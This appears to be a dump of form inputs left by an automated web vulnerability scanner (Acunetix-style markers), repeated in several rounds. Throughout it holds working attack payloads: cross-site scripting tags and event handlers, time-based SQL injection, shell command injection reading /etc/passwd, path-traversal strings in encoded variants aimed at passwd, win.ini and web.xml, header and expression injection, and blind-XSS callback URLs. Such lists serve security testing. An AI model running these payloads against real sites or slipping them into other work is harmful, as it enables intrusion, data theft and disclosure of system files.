response.write(9827454*9107676)

1

1

1<body onload=prompt(948794)>

1

WEB-INF/web.xml

'+response.write(9827454*9107676)+'

&cat /etc/passwd&

1

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988215)>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9827454*9107676)+"

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(978240)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(940827)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

-1

1<ScRiPt%20>prompt(965803)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

1&lt

1

${100357+100323}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(951576) //\xf6>

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(957213)>

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n961109=v996940

sQAM8jMf'

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

<a href='http://www.acunetix.com'>website security</a>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

PjlVTgPz')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

testasp.vulnweb.com

YhmAg4xC'))

/etc/passwd

^(#$!@#$)(()))******

1

1_B7dLd <ScRiPt >prompt(949238)</ScRiPt>

'

'

1

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit91otud3a5m.bxss.me/

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

zhB3jX7B'

1

'&dir&'

1

1

'"

comments

http://www.acunetix.tst

EsKXP4hS')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

1

1

"&dir&"

1

comments/.

<!--

ABx0y5nG'))

1

1'"()&%<ScRiPt >prompt(932753)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

1

'"()&%<ScRiPt >prompt(986361)</ScRiPt>

WEB-INF/web.xml

'|dir

1

1

1

1

1

1_947958

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu7579\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7579

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux4695\xc0\xbez1\xc0\xbcz2a\x90bcxuca4695

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(973814)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(957556)</script>

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(954257)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931315></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(977203)</ScRiPt>

1

1

1

response.write(9486595*9851573)

1<video><source onerror="javascript:prompt(964396)">

1

WEB-INF/web.xml

1

1

'+response.write(9486595*9851573)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952220)"></g></svg>

&cat /etc/passwd&

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9486595*9851573)+"

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(926301))>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(961534)>

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

-1)

1

1

${99052+99182}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983036)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(975488)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

9iWVDvjX'

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(970105)>

1&n973117=v976504

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'|'ld

)

bwsZh4dn')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(997713)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1

!(()&&!|*|*|

z9ylXUDk'))

testasp.vulnweb.com

'"()

1&lt

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

'

'

-1

1

1

\xf6<img acu onmouseover=prompt(976996) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

-1)

1

1

1<input autofocus onfocus=prompt(974188)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

-1))

1

http://hitB955Q4kcch.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

&dir

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}\

LsNrjsOs'

1

1

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_pkXnH <ScRiPt >prompt(971785)</ScRiPt>

WRnXYFSq')

1

http://www.acunetix.tst

file:///etc/passwd

comments

1

1

1

"&dir&"

1

1

pxyGnyC5'))

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

|dir

'"

1'"()&%<ScRiPt >prompt(973745)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

'|dir

<!--

1

'"()&%<ScRiPt >prompt(901027)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

"|dir

1

1_997056

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu8093\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8093

1

../../../../../../../../../../boot.ini

1

acux4873\xc0\xbez1\xc0\xbcz2a\x90bcxuca4873

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992645)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(933065)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912098)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932161></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(923224)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(950320)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951665)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(920066))>

response.write(9270127*9399396)

1

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

'+response.write(9270127*9399396)+'

1

1

1

WEB-INF/web.xml

1<body onload=prompt(969533)>

'&cat /etc/passwd&'

"+response.write(9270127*9399396)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918011)>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(932777)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(909984)>

../../../../../../../../../../etc/passwd.jpg

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

${100347+99211}

-1)

1

1<ScRiPt%20>prompt(987913)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&n972001=v945767

vJq5DkOM'

1

\xf6<img acu onmouseover=prompt(955401) //\xf6>

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

4Flj29UR')

1

1<input autofocus onfocus=prompt(997961)>

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

FTC02UsD'))

1

^(#$!@#$)(()))******

1

'"()

/etc/passwd

1

'

'

[url=http://www.acunetix.com]website security[/url]

-1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

"

1_arF3f <ScRiPt >prompt(953085)</ScRiPt>

-1)

1

1

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

1

1

1

http://hitGJELHxiFZh.bxss.me/

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

9Cv8Jpi4'

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

1

ni3drKeV')

comments

1

1

"&dir&"

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

cTxMIMBt'))

'"

1'"()&%<ScRiPt >prompt(928095)</ScRiPt>

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1

1

'"()&%<ScRiPt >prompt(960390)</ScRiPt>

<!--

'|dir

1

WEB-INF/web.xml

1

1

1_988338

1

1

WEB-INF\web.xml

1

1

1

acu8366\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8366

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux9927\xc0\xbez1\xc0\xbcz2a\x90bcxuca9927

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(949208)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(930242)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(948223)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916843></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(919824)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(945350)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949401)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990799))>

1

response.write(9409789*9044976)

1

1

1

1<iframe src='data:text/html

1

1

'+response.write(9409789*9044976)+'

WEB-INF/web.xml

1<body onload=prompt(991486)>

&cat /etc/passwd&

1

"+response.write(9409789*9044976)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982080)>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(981704)>

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(930335)>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

${100076+99718}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1<ScRiPt%20>prompt(975851)</sCripT>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

ohSSkua9'

1&lt

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

8ipHvj3c')

1

1

1&n910405=v911624

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(936104) //\xf6>

'|'ld

1

15TiqcJg'))

"|"ld

)

1

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(996142)>

1

-1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

1

-1)

^(#$!@#$)(()))******

'

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

"

1

1

"

1

1_418VZ <ScRiPt >prompt(939881)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

ISeRKPza'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

http://hitAG1bpTnuZR.bxss.me/

1

1

1

X3KDYZsz')

comments

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

SW2fOjoM'))

1

comments

'&dir&'

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1'"()&%<ScRiPt >prompt(958046)</ScRiPt>

http://www.acunetix.tst

1

1

comments/.

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

'"

1

1

1

1

1

|dir

WEB-INF/web.xml

<!--

1

'"()&%<ScRiPt >prompt(950515)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1

1_977513

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu8335\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8335

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4432\xc0\xbez1\xc0\xbcz2a\x90bcxuca4432

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(996807)</ScRiPt>

1

1

1

1<script>prompt(990695)</script>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(978045)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997336></ScRiPt>

1

1

1<ScRiPt >prompt(931911)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(991063)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926653)"></g></svg>

1

response.write(9676008*9236665)

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957820))>

'+response.write(9676008*9236665)+'

WEB-INF\web.xml

1

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

"+response.write(9676008*9236665)+"

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(905809)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969538)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99809+100470}

1<img src=xyz OnErRor=prompt(976508)>

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

|cat /etc/passwd#

1

1

1<img/src=">" onerror=alert(994971)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

'|'ld

)

1&n928675=v996490

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(908905)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

3peIIbGk'

!(()&&!|*|*|

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

6ZlZaODB')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(900398) //\xf6>

PHlBaxq5'))

1

1

1

'"()

'

'

1<input autofocus onfocus=prompt(957131)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

-1

1

1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

http://hitYPMiLpyX1A.bxss.me/

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1_ngCFa <ScRiPt >prompt(974207)</ScRiPt>

PMnDkvP0'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

'&dir&'

1

OGew6RpN')

http://www.acunetix.tst

1

1

1

file:///etc/passwd

'"

"&dir&"

comments

0mhFyRcx'))

1

1

1'"()&%<ScRiPt >prompt(938146)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

<!--

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(975143)</ScRiPt>

1

'|dir

1

1

1

1

1

WEB-INF\web.xml

1_963325

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

acu2787\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2787

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux6251\xc0\xbez1\xc0\xbcz2a\x90bcxuca6251

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(953403)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(967542)</script>

1

1

1

1<ScRiPt >prompt(945915)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990189></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(909986)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(908442)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973255)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(988119))>

response.write(9115169*9693819)

1

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9115169*9693819)+'

WEB-INF/web.xml

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9115169*9693819)+"

1<body onload=prompt(926950)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966471)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1

1<img src=xyz OnErRor=prompt(980766)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

|cat /etc/passwd#

1<img/src=">" onerror=alert(998606)>

1

1

${99079+99843}

1&n994948=v917349

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1

1

1<ScRiPt%20>prompt(997168)</sCripT>

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

0JLe8NEX'

"|"ld

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

gDJd0zqR')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(988791) //\xf6>

testasp.vulnweb.com

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

bJbifYXw'))

1

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(904447)>

1

"

/etc/passwd

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

http://hitrDDYPXXUVX.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

&dir

-1))

1

1_NNZ8f <ScRiPt >prompt(903892)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

comments

5lkemKIU'

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

8mtXgSlz')

comments/.

1

1

http://www.acunetix.tst

file:///etc/passwd

1

|dir

1

0K3ZaKWE'))

1

1

'"

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945796)</ScRiPt>

1

1

1

<!--

"|dir

1

'"()&%<ScRiPt >prompt(906129)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1_961565

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu3016\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3016

1

1

1

../../../../../../../../../../boot.ini

acux10236\xc0\xbez1\xc0\xbcz2a\x90bcxuca10236

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(938935)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(914645)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(957528)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983628></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(978166)</ScRiPt>

